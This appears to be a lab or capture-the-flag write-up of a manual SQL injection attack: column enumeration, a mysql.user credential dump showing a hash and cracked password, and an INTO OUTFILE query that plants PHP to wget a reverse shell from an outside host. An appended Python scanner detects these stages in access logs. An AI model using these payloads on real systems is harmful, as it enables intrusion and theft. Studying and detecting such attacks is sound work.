Exploitation

SQL Injection

After testing for LFI, RFI and SQLi, we learn that the application is vulnerable to SQL injection by using the sleep() command. For the following exploitation, we will use the manual method for OSCP practice and the SQLi method for better practice.

Method 1: Manual SQLi

Testing with the SQL sleep() command demonstrates that the web page is vulnerable to SQL injection. The %20 in the request is a URL-encoded space.

[Screenshot: successful]

Alternatively, you can use this method:

Checking for the number of columns using ORDER BY

Step 1: Column Enumeration

SELECT * FROM table
ORDER BY column-name

The above SQL statement returns all the columns of the "table" table and orders the result by the column "column-name". Instead of a column name, you can use an integer, which refers to the column at that position in the result.

Example:

SELECT * FROM table
ORDER BY 1

The above statement returns all the columns of the table "table" and orders the result by the first column. Knowing this, we can abuse it by ordering by a column that does not exist. If the column does not exist, we will either:

  • Have the application behave weirdly or

  • Have the application throw an error based on the validation that is being done at the backend.

To enumerate the number of columns, we increase the ORDER BY value until the application throws an error or no longer returns a result.

ORDER BY 7

From the above SQL statements, we can conclude that the query uses exactly 7 columns. Next, let's determine which of these columns are displayed on the page.

Step 2: Column Presentation and Type

Using the SQL UNION operator, we can determine where each column's result is displayed on the page. Here is a sample query.

SELECT column-name-1 FROM table1
UNION
SELECT column-name-2 FROM table2;

The above statement selects "column-name-1" from "table1", then selects "column-name-2" from "table2", and uses the UNION operator to combine the results of the two select statements. NOTE: the number of columns has to be the same in both select statements for the query to work.

Knowing this, we can analyze the following statement.

SELECT column-name-1 FROM table1
UNION
SELECT 1

The first select statement queries "column-name-1" from "table1" and the second select statement simply returns the value 1. The union of these two statements is the combination of their results. Depending on certain conditions, such as matching data types of the columns, the above query might generate an error. Keep that in mind.

At first, with a known cod value, we got the output of the first select statement but not the second; in my case, nothing from the second appeared. A possible reason is that the application can only print one entry at a time. Changing our cod value to one that doesn't exist prints the result of the second statement instead. This lets us learn which columns correspond to which elements on the page.

Step 3: Retrieve Backend Information

We can use SQL commands to further enumerate and exploit the database.

SELECT host, user, password FROM mysql.user

gives nothing, because we're querying more than one column in the sub-select. We can verify this by outputting just the password column.

SELECT password FROM mysql.user
[Screenshot: HASH Found!]

We get a hash! In order to output multiple columns, you can use the group_concat() function.

SELECT group_concat(host,user,password) FROM mysql.user

[Screenshot: Found Username and HASH]

  • Username: DBadmin

  • Hash: 2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

  • Password: imissyou

An alternative method is LOAD_FILE(); this would have been useful if MySQL were running as root, which was not the case for this box.

Step 4: Command Execution

We can add PHP code via SQL. To do so, we need to save that code into a file and then call the file so that the code executes.

Set up your PHP reverse shell and listener, then input the following SQL query:

9999 union select 1,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.34:5555/php-reverse-shell.php\");?>'),3,4,5,6,7 INTO OUTFILE '/var/www/html/test4.php'
What the above query does is write the query's result (including the PHP code) to the file /var/www/html/test4.php, which is the document root of the web server. So when we request test4.php, the PHP code that we included in our select statement executes and downloads the reverse shell.

This downloads the PHP reverse shell into the /var/www/html/ folder.

The reverse shell executes when shell.php is requested.

[Screenshot: Connection Established]
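As an added defensive example (not part of the original write-up), here is a small Python scanner that URL-decodes requests in Apache-style access-log lines and flags each stage of the chain described above: the sleep() timing probe, ORDER BY column counting, UNION SELECT, the mysql.user / group_concat() credential dump, and INTO OUTFILE / LOAD_FILE file access. The log lines, client IPs and the /room.php path are constructed sample data, not taken from the box.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original write-up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /room.php?cod=1%20and%20sleep(5) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /room.php?cod=1%20order%20by%207 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET /room.php?cod=1%20order%20by%208 HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /room.php?cod=9999%20union%20select%201,(select%20group_concat(host,user,password)%20from%20mysql.user),3,4,5,6,7 HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:30 +0000] "GET /room.php?cod=9999%20union%20select%201,2,3,4,5,6,7%20into%20outfile%20'/var/www/html/x.php' HTTP/1.1" 200 0
"""

# Client IP, request target and status code from a common/combined log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# One rule per stage of the chain in the write-up, matched on the decoded request.
RULES = {
    "timing_probe": re.compile(r"\bsleep\s*\(", re.I),
    "column_enum": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "cred_dump": re.compile(r"\bmysql\.user\b|\bgroup_concat\s*\(", re.I),
    "file_access": re.compile(r"\binto\s+(out|dump)file\b|\bload_file\s*\(", re.I),
}


def decode_target(target):
    """Percent-decode twice so a double-encoded payload is still inspected in clear."""
    return unquote_plus(unquote_plus(target))


def scan_log(text):
    """Return (client_ip, status, [matched stages]) for every suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        ip, target, status = m.group(1), decode_target(m.group(2)), int(m.group(3))
        hits = [name for name, rx in RULES.items() if rx.search(target)]
        if hits:
            findings.append((ip, status, hits))
    return findings


def stages_per_client(findings):
    """Distinct stages seen per client: one that covers probe, enumeration, dump
    and file access has walked the whole chain, not merely tripped a single rule."""
    seen = {}
    for ip, _status, hits in findings:
        seen.setdefault(ip, set()).update(hits)
    return seen


if __name__ == "__main__":
    for ip, status, hits in scan_log(SAMPLE_LOG):
        print(ip, status, ", ".join(hits))
    print(stages_per_client(scan_log(SAMPLE_LOG)))
```

The ORDER BY 8 request that returns a 500 right after ORDER BY 7 succeeds is the column-count boundary from Step 1, so a status flip on consecutive column_enum hits from one client is worth alerting on by itself.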
